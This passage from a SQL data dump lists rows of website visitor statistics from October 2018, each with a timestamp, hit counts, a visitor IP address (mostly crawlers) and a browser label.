,1,0,0,'54.36.148.241','other'),(318606,1539791818,1,1,0,0,'54.36.148.176','other'),(318607,1539791871,1,1,0,0,'54.36.148.116','other'),(318608,1539791897,1,1,0,0,'54.36.149.34','other'),(318609,1539792418,1,1,0,0,'54.36.149.57','other'),(318610,1539792639,1,1,0,0,'207.46.13.16','other'),(318611,1539792787,1,1,0,0,'216.244.66.241','other'),(318612,1539792794,1,1,0,0,'54.36.148.184','other'),(318613,1539792814,1,1,0,0,'54.36.148.130','other'),(318614,1539793036,1,1,0,0,'54.36.148.162','other'),(318615,1539793484,1,1,0,0,'54.36.149.54','other'),(318616,1539793709,1,1,0,0,'54.36.148.50','other'),(318617,1539793959,1,1,0,0,'54.36.149.72','other'),(318618,1539794486,1,1,0,0,'54.36.148.129','other'),(318619,1539794969,1,1,0,0,'54.36.149.99','other'),(318620,1539795050,1,1,0,0,'8.29.198.27','other'),(318621,1539795319,1,1,0,0,'46.229.168.149','other'),(318622,1539795344,1,1,0,0,'54.36.148.211','other'),(318623,1539795397,1,1,0,0,'5.228.194.194','msie'),(318624,1539795487,3,3,0,0,'216.244.66.241','other'),(318625,1539795669,1,1,0,0,'95.163.255.96','other'),(318626,1539796200,1,1,0,0,'54.36.148.12','other'),(318627,1539796241,1,1,0,0,'46.229.168.144','other'),(318628,1539796406,1,1,0,0,'54.36.149.63','other'),(318629,1539796792,1,1,0,0,'54.36.148.241','other'),(318630,1539796838,1,1,0,0,'54.36.148.58','other'),(318631,1539796843,1,1,0,0,'54.36.149.12','other'),(318632,1539797094,1,1,0,0,'91.196.178.61','chrome'),(318633,1539797181,1,1,0,0,'54.36.148.20','other'),(318634,1539797284,1,1,0,0,'54.36.148.90','other'),(318635,1539797293,1,1,0,0,'54.36.149.24','other'),(318636,1539797366,1,1,0,0,'54.36.148.253','other'),(318637,1539798050,1,1,0,0,'54.36.148.121','other'),(318638,1539798568,3,3,0,0,'216.244.66.241','other'),(318639,1539798690,1,1,0,0,'54.36.148.237','other'),(318640,1539798746,1,1,0,0,'54.36.148.83','other'),(318641,1539798750,1,1,0,0,'91.196.178.174','chrome'),(318642,1539798941,1,1,0,0,'54.36.149.106','other'),(318643,1539799220,1,1,0,0,'54.36.148.152','other'),(318644,1539799498,1,1,0,0,'207.46.13.16','other'),(318645,1539799545,1,1,0,0,'54.36.148.169','other'),(318646,1539799615,1,1,0,0,'54.36.148.210','other'),(318647,1539800607,1,1,0,0,'54.36.148.234','other'),(318648,1539800700,1,1,0,0,'216.244.66.241','other'),(318649,1539801345,1,1,0,0,'95.163.255.94','other'),(318650,1539801532,1,1,0,0,'54.36.149.13','other'),(318651,1539802168,1,1,0,0,'8.29.198.26','other'),(318652,1539802177,1,1,0,0,'8.29.198.27','other'),(318653,1539802398,1,1,0,0,'54.36.148.201','other'),(318654,1539802509,1,1,0,0,'54.36.148.69','other'),(318655,1539802720,1,1,0,0,'54.36.149.107','other'),(318656,1539802939,1,1,0,0,'54.36.149.4','other'),(318657,1539803022,1,1,0,0,'193.106.30.98','firefox'),(318658,1539803138,1,1,0,0,'216.244.66.241','other'),(318659,1539803301,1,1,0,0,'54.36.148.243','other'),(318660,1539804143,1,1,0,0,'54.36.149.7','other'),(318661,1539804375,1,1,0,0,'54.36.149.92','other'),(318662,1539804903,1,1,0,0,'54.36.148.27','other'),(318663,1539805000,1,1,0,0,'54.36.148.22','other'),(318664,1539805891,1,1,0,0,'8.29.198.26','other'),(318665,1539805927,1,1,0,0,'54.36.148.135','other'),(318666,1539806254,1,1,0,0,'54.36.148.159','other'),(318667,1539806472,1,1,0,0,'54.36.148.218','other'),(318668,1539806800,1,1,0,0,'54.36.148.39','other'),(318669,1539807009,1,1,0,0,'54.36.148.100','other'),(318670,1539807174,1,1,0,0,'54.36.148.107','other'),(318671,1539807246,1,1,0,0,'46.229.168.151','other'),(318672,1539807280,1,1,0,0,'46.229.168.141','other'),(318673,1539809040,1,1,0,0,'216.244.66.241','other'),(318674,1539809513,1,1,0,0,'54.36.149.39','other'),(318675,1539810194,1,1,0,0,'54.36.148.42','other'),(318676,1539810893,1,1,0,0,'46.229.168.145','other'),(318677,1539811216,1,1,0,0,'54.36.148.198','other'),(318678,1539811421,1,1,0,0,'216.244.66.241','other'),(318679,1539811709,1,1,0,0,'54.36.149.33','other'),(318680,1539811746,1,1,0,0,'54.36.148.192','other'),(318681,1539812000,1,1,0,0,'54.36.148.55','other'),(318682,1539812398,1,1,0,0,'120.55.61.200','firefox'),(318683,1539812781,1,1,0,0,'40.77.167.102','other'),(318684,1539812835,1,1,0,0,'54.36.148.166','other'),(318685,1539812865,1,1,0,0,'54.36.149.98','other'),(318686,1539812916,1,1,0,0,'54.36.148.111','other'),(318687,1539812946,1,1,0,0,'54.36.149.9','other'),(318688,1539812997,1,1,0,0,'39.106.11.232','firefox'),(318689,1539813005,1,1,0,0,'8.29.198.27','other'),(318690,1539813023,1,1,0,0,'8.29.198.25','other'),(318691,1539813352,1,1,0,0,'54.36.148.154','other'),(318692,1539813450,1,1,0,0,'180.76.15.140','other'),(318693,1539813510,2,2,0,0,'216.244.66.241','other'),(318694,1539813722,1,1,0,0,'54.36.148.144','other'),(318695,1539813903,1,1,0,0,'173.212.197.154','chrome'),(318696,1539813910,1,1,0,0,'66.249.66.61','chrome'),(318697,1539813931,1,1,0,0,'207.46.13.22','other'),(318698,1539813999,1,1,0,0,'54.36.148.56','other'),(318699,1539814913,1,1,0,0,'54.36.148.155','other'),(318700,1539815138,1,1,0,0,'54.36.148.133','other'),(318701,1539815335,1,1,0,0,'207.46.13.44','other'),(318702,1539815450,1,1,0,0,'180.76.15.16','other'),(318703,1539815913,1,1,0,0,'46.229.168.149','other'),(318704,1539816286,1,1,0,0,'54.36.148.154','other'),(318705,1539816383,1,1,0,0,'178.154.244.11','other'),(318706,1539816580,1,1,0,0,'54.36.148.135','other'),(318707,1539816732,1,1,0,0,'8.29.198.25','other'),(318708,1539816948,1,1,0,0,'54.36.148.51','other'),(318709,1539816996,1,1,0,0,'54.36.148.165','other'),(318710,1539817035,1,1,0,0,'51.254.209.128','other'),(318711,1539817207,1,1,0,0,'54.36.148.126','other'),(318712,1539817691,1,1,0,0,'54.36.149.39','other'),(318713,1539817981,1,1,0,0,'54.36.148.225','other'),(318714,1539818451,1,1,0,0,'178.255.215.94','other'),(318715,1539818491,1,1,0,0,'54.36.149.89','other'),(318716,1539818645,1,1,0,0,'54.36.148.251','other'),(318717,1539819129,1,1,0,0,'178.154.244.11','other'),(318718,1539819240,1,1,0,0,'54.36.148.60','other'),(318719,1539819488,1,1,0,0,'54.36.149.20','other'),(318720,1539819906,1,1,0,0,'54.36.149.12','other'),(318721,1539820202,1,1,0,0,'54.36.148.120','other'),(318722,1539820282,1,1,0,0,'54.36.148.117','other'),(318723,1539820572,1,1,0,0,'216.244.66.241','other'),(318724,1539820728,1,1,0,0,'54.36.149.41','other'),(318725,1539821249,1,1,0,0,'54.36.148.25','other'),(318726,1539821412,1,1,0,0,'54.36.148.97','other'),(318727,1539821496,1,1,0,0,'216.244.66.241','other'),(318728,1539821528,1,1,0,0,'54.36.148.43','other'),(318729,1539821605,1,1,0,0,'66.249.66.157','chrome'),(318730,1539821661,1,1,0,0,'54.36.148.240','other'),(318731,1539821680,1,1,0,0,'54.36.148.61','other'),(318732,1539821846,1,1,0,0,'54.36.149.91','other'),(318733,1539822055,1,1,0,0,'54.36.148.40','other'),(318734,1539822334,1,1,0,0,'54.36.148.65','other'),(318735,1539822530,1,1,0,0,'54.36.148.208','other'),(318736,1539822599,1,1,0,0,'54.36.148.181','other'),(318737,1539822730,1,1,0,0,'54.36.148.139','other'),(318738,1539822806,1,1,0,0,'54.36.149.107','other'),(318739,1539823030,1,1,0,0,'54.36.148.126','other'),(318740,1539823189,1,1,0,0,'54.36.148.143','other'),(318741,1539823644,1,1,0,0,'54.36.149.92','other'),(318742,1539823857,1,1,0,0,'54.36.148.181','other'),(318743,1539823859,1,1,0,0,'8.29.198.27','other'),(318744,1539823903,1,1,0,0,'8.29.198.26','other'),(318745,1539824181,1,1,0,0,'46.229.168.142','other'),(318746,1539824409,1,1,0,0,'54.36.148.102','other'),(318747,1539824440,1,1,0,0,'54.36.148.206','other'),(318748,1539824910,1,1,0,0,'54.36.149.58','other'),(318749,1539825011,1,1,0,0,'216.244.66.241','other'),(318750,1539825027,1,1,0,0,'66.249.66.57','chrome'),(318751,1539825045,1,1,0,0,'54.36.149.28','other'),(318752,1539825781,1,1,0,0,'46.229.168.129','other'),(318753,1539826191,1,1,0,0,'54.36.148.121','other'),(318754,1539826999,1,1,0,0,'54.36.148.109','other'),(318755,1539827007,1,1,0,0,'54.36.148.154','other'),(318756,1539827074,1,1,0,0,'54.36.149.23','other'),(318757,1539827383,1,1,0,0,'54.36.149.60','other'),(318758,1539827573,1,1,0,0,'8.29.198.26','other'),(318759,1539827663,1,1,0,0,'66.102.9.40','chrome'),(318760,1539828734,2,2,0,0,'54.165.59.7','other'),(318761,1539828861,4,4,0,0,'148.251.120.201','other'),(318762,1539828890,1,1,0,0,'46.147.171.58','msie'),(318763,1539828933,1,1,0,0,'46.229.168.146','other'),(318764,1539828975,1,1,0,0,'95.163.255.99','other'),(318765,1539829870,1,1,0,0,'46.229.168.145','other'),(318766,1539830229,1,1,0,0,'54.36.148.206','other'),(318767,1539830422,1,1,0,0,'54.36.148.173','other'),(318768,1539830652,1,1,0,0,'216.244.66.241','other'),(318769,1539830766,1,1,0,0,'54.36.149.58','other'),(318770,1539831010,1,1,0,0,'54.36.148.102','other'),(318771,1539831623,1,1,0,0,'216.244.66.241','other'),(318772,1539833456,1,1,0,0,'54.36.148.149','other'),(318773,1539833763,1,1,0,0,'54.36.148.158','other'),(318774,1539833960,1,1,0,0,'54.36.149.35','other'),(318775,1539834002,1,1,0,0,'54.36.148.117','other'),(318776,1539834063,1,1,0,0,'54.36.148.240','other'),(318777,1539834703,1,1,0,0,'8.29.198.26','other'),(318778,1539834757,1,1,0,0,'8.29.198.27','other'),(318779,1539834883,1,1,0,0,'54.36.148.45','other'),(318780,1539834935,1,1,0,0,'54.36.148.75','other'),(318781,1539835118,1,1,0,0,'46.229.168.139','other'),(318782,1539835364,1,1,0,0,'54.36.148.100','other'),(318783,1539835492,1,1,0,0,'54.36.148.57','other'),(318784,1539835603,1,1,0,0,'54.36.149.29','other'),(318785,1539835670,23,23,0,0,'82.193.102.149','other'),(318786,1539835830,1,1,0,0,'54.36.148.240','other'),(318787,1539835914,1,1,0,0,'54.36.148.231','other'),(318788,1539836110,1,1,0,0,'54.36.148.117','other'),(318789,1539836549,1,1,0,0,'54.36.148.187','other'),(318790,1539836634,1,1,0,0,'54.36.149.98','other'),(318791,1539836636,1,1,0,0,'54.36.148.82','other'),(318792,1539836643,1,1,0,0,'54.36.148.216','other'),(318793,1539836693,2,2,0,0,'66.249.66.61','chrome'),(318794,1539836699,1,1,0,0,'54.36.148.233','other'),(318795,1539836781,1,1,0,0,'46.229.168.129','other'),(318796,1539836810,1,1,0,0,'54.36.148.247','other'),(318797,1539837043,1,1,0,0,'54.36.148.165','other'),(318798,1539837362,1,1,0,0,'54.36.148.116','other'),(318799,1539837643,1,1,0,0,'216.244.66.241','other'),(318800,1539837699,1,1,0,0,'5.188.210.11','chrome'),(318801,1539837818,1,1,0,0,'140.143.4.221','firefox'),(318802,1539838406,1,1,0,0,'8.29.198.26','other'),(318803,1539838530,1,1,0,0,'54.36.148.16','other'),(318804,1539838633,1,1,0,0,'54.36.149.55','other'),(318805,1539838756,1,1,0,0,'54.36.148.233','other'),(318806,1539839108,1,1,0,0,'216.244.66.241','other'),(318807,1539839657,1,1,0,0,'54.36.149.32','other'),(318808,1539839691,1,1,0,0,'54.36.148.58','other'),(318809,1539839768,1,1,0,0,'54.36.148.136','other'),(318810,1539840051,1,1,0,0,'54.36.148.139','other'),(318811,1539840083,1,1,0,0,'54.36.148.182','other'),(318812,1539840219,1,1,0,0,'54.36.148.88','other'),(318813,1539840938,1,1,0,0,'54.36.148.20','other'),(318814,1539841579,1,1,0,0,'54.36.148.26','other'),(318815,1539841684,2,2,0,0,'216.244.66.241','other'),(318816,1539841759,1,1,0,0,'54.36.149.18','other'),(318817,1539841761,1,1,0,0,'54.36.148.99','other'),(318818,1539841860,1,1,0,0,'54.36.148.138','other'),(318819,1539842112,1,1,0,0,'54.36.148.89','other'),(318820,1539842362,1,1,0,0,'54.36.148.91','other'),(318821,1539842391,1,1,0,0,'54.36.148.92','other'),(318822,1539842442,14,14,0,0,'5.9.154.68','other'),(318823,1539842680,1,1,0,0,'37.52.120.102','chrome'),(318824,1539842835,1,1,0,0,'54.36.148.247','other'),(318825,1539842869,1,1,0,0,'54.36.148.172','other'),(318826,1539843338,2,2,0,0,'54.36.148.170','other'),(318827,1539843595,1,1,0,0,'52.53.201.78','chrome'),(318828,1539843634,1,1,0,0,'54.36.149.36','other'),(318829,1539844048,1,1,0,0,'54.36.148.194','other'),(318830,1539844213,1,1,0,0,'54.36.149.50','other'),(318831,1539844355,1,1,0,0,'54.36.148.135','other'),(318832,1539844595,2,2,0,0,'216.244.66.241','other'),(318833,1539845064,1,1,0,0,'180.76.15.31','other'),(318834,1539845367,1,1,0,0,'54.36.148.15','other'),(318835,1539845400,1,1,0,0,'54.36.148.59','other'),(318836,1539845533,1,1,0,0,'8.29.198.25','other'),(318837,1539845609,1,1,0,0,'8.29.198.27','other'),(318838,1539846064,1,1,0,0,'54.36.148.92','other'),(318839,1539846240,1,1,0,0,'54.36.149.32','other'),(318840,1539846579,1,1,0,0,'216.244.66.241','other'),(318841,1539846625,1,1,0,0,'54.36.149.34','other'),(318842,1539846698,1,1,0,0,'54.36.148.25','other'),(318843,1539846774,1,1,0,0,'46.229.168.136','other'),(318844,1539847246,1,1,0,0,'176.105.206.182','chrome'),(318845,1539847464,1,1,0,0,'91.196.178.89','chrome'),(318846,1539847751,1,1,0,0,'54.36.148.228','other'),(318847,1539847826,1,1,0,0,'54.36.148.223','other'),(318848,1539848087,1,1,0,0,'54.36.148.107','other'),(318849,1539848188,1,1,0,0,'94.130.9.183','other'),(318850,1539848301,1,1,0,0,'94.179.52.23','firefox'),(318851,1539848803,1,1,0,0,'54.36.149.76','other'),(318852,1539848971,1,1,0,0,'54.36.149.44','other'),(318853,1539849231,1,1,0,0,'8.29.198.26','other'),(318854,1539849488,2,2,0,0,'216.244.66.241','other'),(318855,1539849562,1,1,0,0,'54.36.149.24','other'),(318856,1539849722,1,1,0,0,'195.88.158.18','firefox'),(318857,1539849751,1,1,0,0,'77.93.41.218','chrome'),(318858,1539849878,1,1,0,0,'54.36.148.135','other'),(318859,1539850139,1,1,0,0,'93.78.212.202','chrome'),(318860,1539850331,1,1,0,0,'54.36.148.194','other'),(318861,1539850336,1,1,0,0,'91.196.178.169','chrome'),(318862,1539850491,1,1,0,0,'54.36.149.22','other'),(318863,1539850980,1,1,0,0,'92.113.156.46','chrome'),(318864,1539851671,1,1,0,0,'54.36.148.116','other'),(318865,1539851722,1,1,0,0,'46.229.168.144','other'),(318866,1539851888,3,3,0,0,'216.244.66.241','other'),(318867,1539851933,1,1,0,0,'54.36.149.56','other'),(318868,1539851982,1,1,0,0,'54.36.148.196','other'),(318869,1539852010,1,1,0,0,'54.36.148.183','other'),(318870,1539852065,1,1,0,0,'130.180.220.16','chrome'),(318871,1539852232,1,1,0,0,'54.36.149.26','other'),(318872,1539852243,1,1,0,0,'54.36.148.155','other'),(318873,1539852340,1,1,0,0,'54.36.149.57','other'),(318874,1539852464,1,1,0,0,'91.196.178.169','chrome'),(318875,1539852676,1,1,0,0,'54.36.148.162','other'),(318876,1539853218,1,1,0,0,'95.132.43.50','firefox'),(318877,1539853369,1,1,0,0,'54.36.149.97','other'),(318878,1539853680,1,1,0,0,'54.36.149.93','other'),(318879,1539853971,1,1,0,0,'176.105.206.182','chrome'),(318880,1539853973,1,1,0,0,'216.244.66.241','other'),(318881,1539854000,1,1,0,0,'54.36.149.11','other'),(318882,1539854183,1,1,0,0,'54.36.149.54','other'),(318883,1539854278,1,1,0,0,'54.36.148.14','other'),(318884,1539854390,1,1,0,0,'91.196.178.131','firefox'),(318885,1539854433,1,1,0,0,'193.106.30.98','firefox'),(318886,1539854572,1,1,0,0,'54.36.148.89','other'),(318887,1539854620,1,1,0,0,'54.36.148.194','other'),(318888,1539854640,2,2,0,0,'54.36.149.24','other'),(318889,1539855307,1,1,0,0,'95.163.255.93','other'),(318890,1539855392,1,1,0,0,'54.36.148.184','other'),(318891,1539855466,1,1,0,0,'54.36.148.209','other'),(318892,1539855572,1,1,0,0,'94.153.229.229','other'),(318893,1539855577,1,1,0,0,'46.229.168.153','other'),(318894,1539855828,1,1,0,0,'92.38.40.2','chrome'),(318895,1539856265,1,1,0,0,'54.36.148.51','other'),(318896,1539856360,1,1,0,0,'8.29.198.25','other'),(318897,1539856471,1,1,0,0,'8.29.198.26','other'),(318898,1539856965,1,1,0,0,'54.36.149.92','other'),(318899,1539857023,1,1,0,0,'54.36.149.18','other'),(318900,1539857184,1,1,0,0,'216.244.66.241','other'),(318901,1539857345,1,1,0,0,'95.163.255.98','other'),(318902,1539857400,1,1,0,0,'54.36.149.8','other'),(318903,1539857473,1,1,0,0,'62.205.134.182','msie'),(318904,1539857558,1,1,0,0,'54.36.149.90','other'),(318905,1539857734,1,1,0,0,'54.36.148.116','other'),(318906,1539857750,1,1,0,0,'54.36.148.172','other'),(318907,1539857864,1,1,0,0,'46.229.168.141','other'),(318908,1539857938,1,1,0,0,'37.9.113.38','other'),(318909,1539857997,1,1,0,0,'54.36.148.182','other'),(318910,1539858357,1,1,0,0,'54.36.149.48','other'),(318911,1539858500,1,1,0,0,'62.205.134.182','msie'),(318912,1539858537,1,1,0,0,'54.36.148.156','other'),(318913,1539858666,1,1,0,0,'54.36.149.77','other'),(318914,1539859679,1,1,0,0,'54.36.149.60','other'),(318915,1539859736,1,1,0,0,'54.36.149.104','other'),(318916,1539859790,1,1,0,0,'54.36.148.69','other'),(318917,1539860052,1,1,0,0,'18.185.59.121','other'),(318918,1539860074,1,1,0,0,'8.29.198.26','other'),(318919,1539860127,1,1,0,0,'54.36.149.21','other'),(318920,1539860231,1,1,0,0,'54.36.148.106','other'),(318921,1539860529,1,1,0,0,'54.36.148.130','other'),(318922,1539860674,1,1,0,0,'54.36.149.80','other'),(318923,1539860693,1,1,0,0,'54.36.148.98','other'),(318924,1539860752,1,1,0,0,'95.163.255.93','other'),(318925,1539860938,1,1,0,0,'46.229.168.139','other'),(318926,1539860977,1,1,0,0,'66.249.66.145','chrome'),(318927,1539861123,1,1,0,0,'91.196.178.99','chrome'),(318928,1539861216,1,1,0,0,'54.36.148.247','other'),(318929,1539862152,1,1,0,0,'91.196.178.162','chrome'),(318930,1539862212,1,1,0,0,'46.229.168.136','other'),(318931,1539862911,1,1,0,0,'54.36.148.84','other'),(318932,1539862920,1,1,0,0,'46.229.168.150','other'),(318933,1539863172,1,1,0,0,'54.36.148.157','other'),(318934,1539863178,1,1,0,0,'54.36.148.190','other'),(318935,1539863463,1,1,0,0,'95.134.48.19','opera'),(318936,1539863465,1,1,0,0,'91.196.178.88','firefox'),(318937,1539863828,1,1,0,0,'54.36.148.146','other'),(318938,1539863918,1,1,0,0,'54.36.148.96','other'),(318939,1539864037,1,1,0,0,'54.36.148.37','other'),(318940,1539864282,1,1,0,0,'54.36.148.182','other'),(318941,1539864531,1,1,0,0,'54.36.148.218','other'),(318942,1539864598,1,1,0,0,'54.36.148.40','other'),(318943,1539864726,1,1,0,0,'54.36.148.231','other'),(318944,1539864901,2,2,0,0,'216.244.66.241','other'),(318945,1539865085,1,1,0,0,'54.36.149.106','other'),(318946,1539865112,1,1,0,0,'54.36.149.19','other'),(318947,1539865279,1,1,0,0,'54.36.148.75','other'),(318948,1539865670,1,1,0,0,'54.36.148.104','other'),(318949,1539865855,1,1,0,0,'54.36.148.111','other'),(318950,1539866152,1,1,0,0,'91.196.178.89','chrome'),(318951,1539866158,1,1,0,0,'46.229.168.149','other'),(318952,1539866200,1,1,0,0,'54.36.149.95','other'),(318953,1539866492,1,1,0,0,'207.46.13.22','other'),(318954,1539866645,1,1,0,0,'54.36.148.119','other'),(318955,1539866931,1,1,0,0,'54.36.148.203','other'),(318956,1539866945,1,1,0,0,'54.36.148.181','other'),(318957,1539867007,1,1,0,0,'66.249.66.61','chrome'),(318958,1539867108,1,1,0,0,'216.244.66.241','other'),(318959,1539867198,1,1,0,0,'8.29.198.25','other'),(318960,1539867337,1,1,0,0,'8.29.198.27','other'),(318961,1539867798,1,1,0,0,'95.163.255.94','other'),(318962,1539868155,1,0,1,0,'66.249.66.145',''),(318963,1539868187,2,0,2,0,'66.249.66.143',''),(318964,1539868204,1,0,1,0,'66.249.66.147',''),(318965,1539868248,1,1,0,0,'54.36.148.171','other'),(318966,1539868412,1,1,0,0,'54.36.148.151','other'),(318967,1539868879,1,1,0,0,'62.205.134.182','msie'),(318968,1539869113,1,1,0,0,'157.55.39.133','other'),(318969,1539869472,1,1,0,0,'54.36.148.61','other'),(318970,1539869572,1,1,0,0,'54.36.149.45','other'),(318971,1539869818,2,2,0,0,'178.154.244.11','other'),(318972,1539869822,2,2,0,0,'178.154.244.29','other'),(318973,1539869933,1,1,0,0,'54.36.148.114','other'),(318974,1539870076,1,1,0,0,'54.36.149.27','other'),(318975,1539870082,2,2,0,0,'216.244.66.241','other'),(318976,1539870348,1,1,0,0,'54.36.149.46','other'),(318977,1539870387,2,2,0,0,'207.46.13.22','other'),(318978,1539870392,3,3,0,0,'157.55.39.133','other'),(318979,1539870402,1,1,0,0,'54.36.148.10','other'),(318980,1539870411,1,1,0,0,'40.77.167.103','other'),(318981,1539870532,1,1,0,0,'5.45.207.19','other'),(318982,1539870646,1,1,0,0,'54.36.149.83','other'),(318983,1539870912,1,1,0,0,'8.29.198.25','other'),(318984,1539870915,3,3,0,0,'207.46.13.16','other'),(318985,1539870997,1,1,0,0,'5.45.207.79','other'),(318986,1539871292,1,1,0,0,'141.8.142.108','other'),(318987,1539871313,1,1,0,0,'5.59.133.62','msie'),(318988,1539871355,1,1,0,0,'54.36.148.154','other'),(318989,1539871640,2,2,0,0,'178.154.171.27','other'),(318990,1539871831,1,1,0,0,'176.105.206.182','chrome'),(318991,1539872106,1,1,0,0,'54.36.148.11','other'),(318992,1539872526,1,1,0,0,'178.154.200.48','other'),(318993,1539872597,1,1,0,0,'141.8.183.22','other'),(318994,1539872790,1,1,0,0,'54.36.148.33','other'),(318995,1539872862,1,1,0,0,'178.154.244.21','other'),(318996,1539873043,1,1,0,0,'54.36.148.89','other'),(318997,1539873101,1,1,0,0,'46.229.168.148','other'),(318998,1539873186,1,1,0,0,'178.154.171.17','other'),(318999,1539873292,1,1,0,0,'95.108.181.54','other'),(319000,1539873403,1,1,0,0,'54.36.149.103','other'),(319001,1539873684,1,1,0,0,'46.229.168.150','other'),(319002,1539873831,1,1,0,0,'54.36.148.188','other'),(319003,1539874105,1,1,0,0,'188.230.43.254','other'),(319004,1539874120,1,1,0,0,'207.46.13.22','other'),(319005,1539874601,1,1,0,0,'180.76.15.141','other'),(319006,1539875106,1,1,0,0,'216.244.66.241','other'),(319007,1539875302,1,1,0,0,'54.36.148.123','other'),(319008,1539875659,4,4,0,0,'178.154.244.29','other'),(319009,1539875712,1,1,0,0,'178.154.244.11','other'),(319010,1539875915,2,2,0,0,'54.36.149.54','other'),(319011,1539876502,1,1,0,0,'188.230.43.254','other'),(319012,1539876782,1,1,0,0,'54.36.149.92','other'),(319013,1539876807,1,1,0,0,'178.154.244.11','other'),(319014,1539877398,1,1,0,0,'54.36.148.222','other'),(319015,1539877976,1,1,0,0,'54.36.148.135','other'),(319016,1539878045,2,2,0,0,'8.29.198.25','other'),(319017,1539878316,1,1,0,0,'54.36.148.246','other'),(319018,1539878895,1,1,0,0,'95.163.255.99','other'),(319019,1539878903,1,1,0,0,'188.230.43.254','other'),(319020,1539878994,1,1,0,0,'66.249.66.156','chrome'),(319021,1539879036,1,1,0,0,'54.36.148.50','other'),(319022,1539879045,1,1,0,0,'54.36.149.57','other'),(319023,1539879082,1,1,0,0,'54.36.148.70','other'),(319024,1539879106,1,1,0,0,'54.36.148.249','other'),(319025,1539879179,1,1,0,0,'54.36.149.21','other'),(319026,1539879461,1,1,0,0,'216.244.66.241','other'),(319027,1539879504,1,1,0,0,'54.36.148.167','other'),(319028,1539879554,1,1,0,0,'207.46.13.22','other'),(319029,1539879812,1,1,0,0,'54.36.149.30','other'),(319030,1539880203,1,1,0,0,'39.106.0.145','firefox'),(319031,1539880287,1,1,0,0,'54.36.148.193','other'),(319032,1539880636,1,1,0,0,'54.36.149.38','other'),(319033,1539880657,1,1,0,0,'54.36.149.39','other'),(319034,1539880882,1,1,0,0,'37.9.113.103','other'),(319036,1539881144,1,1,0,0,'216.244.66.241','other'),(319037,1539881465,1,1,0,0,'54.36.148.61','other'),(319038,1539881752,1,1,0,0,'8.29.198.27','other'),(319039,1539881855,1,1,0,0,'54.36.149.99','other'),(319040,1539882218,1,1,0,0,'54.36.148.218','other'),(319041,1539883191,1,1,0,0,'54.36.149.32','other'),(319042,1539883211,1,1,0,0,'54.36.148.188','other'),(319043,1539883254,1,1,0,0,'54.36.149.94','other'),(319044,1539883730,1,1,0,0,'54.36.148.57','other'),(319045,1539884216,1,1,0,0,'54.36.148.191','other'),(319046,1539885033,1,1,0,0,'95.163.255.97','other'),(319047,1539885265,1,1,0,0,'95.163.255.94','other'),(319048,1539885275,1,1,0,0,'54.36.148.199','other'),(319049,1539885612,1,1,0,0,'54.36.148.194','other'),(319050,1539885618,1,1,0,0,'54.36.149.40','other'),(319051,1539885828,1,1,0,0,'54.36.148.235','other'),(319052,1539886078,1,1,0,0,'176.193.23.11','chrome'),(319053,1539886256,1,1,0,0,'54.36.148.246','other'),(319054,1539886536,1,1,0,0,'54.36.148.252','other'),(319055,1539886537,1,1,0,0,'54.36.149.64','other'),(319056,1539887655,1,1,0,0,'54.36.149.71','other'),(319057,1539887824,1,1,0,0,'46.229.168.151','other'),(319058,1539887967,1,1,0,0,'216.244.66.241','other'),(319059,1539888106,1,1,0,0,'54.36.148.48','other'),(319060,1539888307,1,1,0,0,'54.36.149.106','other'),(319061,1539888559,1,1,0,0,'54.36.149.46','other'),(319062,1539888664,1,1,0,0,'178.154.244.29','other'),(319063,1539888690,1,1,0,0,'62.205.134.182','msie'),(319064,1539888834,1,1,0,0,'54.36.148.97','other'),(319065,1539888895,2,2,0,0,'8.29.198.27','other'),(319066,1539888961,1,1,0,0,'54.36.148.100','other'),(319067,1539888973,1,1,0,0,'54.36.149.76','other'),(319068,1539889078,1,1,0,0,'94.178.7.180','chrome'),(319069,1539890020,1,1,0,0,'95.163.255.96','other'),(319070,1539890377,1,1,0,0,'207.46.13.22','other'),(319071,1539890432,2,2,0,0,'54.36.148.228','other'),(319072,1539890508,2,2,0,0,'178.154.244.29','other'),(319073,1539891101,1,1,0,0,'54.36.148.195','other'),(319074,1539891223,1,1,0,0,'54.36.148.137','other'),(319075,1539891284,1,1,0,0,'216.244.66.241','other'),(319076,1539891418,1,1,0,0,'178.154.244.29','other'),(319077,1539892524,3,3,0,0,'216.244.66.241','other'),(319078,1539892592,1,1,0,0,'8.29.198.26','other'),(319079,1539892634,1,1,0,0,'54.36.148.203','other'),(319080,1539892722,1,1,0,0,'54.36.148.119','other'),(319081,1539893434,1,1,0,0,'54.36.148.83','other'),(319082,1539893756,1,1,0,0,'54.36.148.101','other'),(319083,1539894266,1,1,0,0,'54.36.148.199','other'),(319084,1539894364,1,1,0,0,'54.36.148.189','other'),(319085,1539894772,1,1,0,0,'66.249.66.57','chrome'),(319086,1539894979,1,1,0,0,'216.244.66.241','other'),(319087,1539895205,1,1,0,0,'54.36.149.91','other'),(319088,1539895324,1,1,0,0,'54.36.148.63','other'),(319089,1539895460,1,1,0,0,'54.36.149.15','other'),(319090,1539895511,1,1,0,0,'54.36.149.39','other'),(319091,1539895895,1,1,0,0,'178.255.215.94','other'),(319092,1539896843,1,1,0,0,'216.244.66.241','other'),(319093,1539896981,1,1,0,0,'54.36.148.83','other'),(319094,1539897555,1,1,0,0,'46.229.168.145','other'),(319095,1539897963,1,1,0,0,'54.36.149.33','other'),(319096,1539898030,1,1,0,0,'54.36.148.231','other'),(319097,1539898371,1,1,0,0,'54.36.148.186','other'),(319098,1539899230,1,1,0,0,'54.36.149.38','other'),(319099,1539899478,1,1,0,0,'54.36.149.49','other'),(319100,1539899739,1,1,0,0,'8.29.198.26','other'),(319101,1539899802,1,1,0,0,'54.36.148.207','other'),(319102,1539899910,1,1,0,0,'8.29.198.25','other'),(319103,1539899915,1,1,0,0,'54.36.148.18','other'),(319104,1539900273,1,1,0,0,'54.36.149.11','other'),(319105,1539900353,1,1,0,0,'207.46.13.16','other'),(319106,1539900392,1,1,0,0,'180.76.15.34','other'),(319107,1539900731,1,1,0,0,'54.36.149.65','other'),(319108,1539901622,1,1,0,0,'158.69.52.114','chrome'),(319109,1539901954,1,1,0,0,'54.36.148.117','other'),(319110,1539901990,1,1,0,0,'54.36.149.24','other'),(319111,1539902753,1,1,0,0,'54.36.148.188','other'),(319112,1539902844,1,1,0,0,'207.46.13.16','other'),(319113,1539902863,1,1,0,0,'54.36.148.131','other'),(319114,1539903300,1,1,0,0,'66.249.66.155','chrome'),(319115,1539903339,1,1,0,0,'109.69.67.17','other'),(319116,1539903423,1,1,0,0,'8.29.198.25','other'),(319117,1539903611,1,1,0,0,'54.36.148.13','other'),(319118,1539903950,1,1,0,0,'66.249.66.157','chrome'),(319119,1539904017,1,1,0,0,'54.36.149.19','other'),(319120,1539904066,